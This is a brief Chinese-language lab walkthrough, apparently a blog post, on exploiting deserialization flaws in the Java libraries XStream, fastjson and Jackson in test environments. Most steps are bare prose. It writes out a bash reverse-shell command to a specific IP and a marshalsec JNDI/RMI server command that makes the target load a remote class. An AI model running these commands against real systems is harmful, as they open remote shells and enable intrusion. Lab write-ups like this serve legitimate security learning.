Java安全-组件安全
一、Xstream
启动环境并访问
接下来我们构造反弹shell语句,bash -i >& /dev/tcp/8.152.2.86/9999 0>&1,紧接着对其进行base64编码。
接下来使用命令即可
首先开启监听

接下来执行命令

接下来抓包对其进行payload构造即可

紧接着回去查看回显

发现成功引用,查看回弹即可
二、fastjson
首先启动环境并访问
我们写一个反弹shell的文件。
紧接着对其编译
紧接着开启监听python3 -m http.server 4444
紧接着查看网站目录即可看到该文件,紧接着我们将其绑定到我们的端口java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://8.152.2.86:4444/#TouchFile" 7788
紧接着发送payload即可
三、Jackson
首先启动环境并访问
进入到容器查看tmp目录下的文件
紧接着我们构造payload进行攻击
接下来我们进行攻击
返回查看即可
至此结束!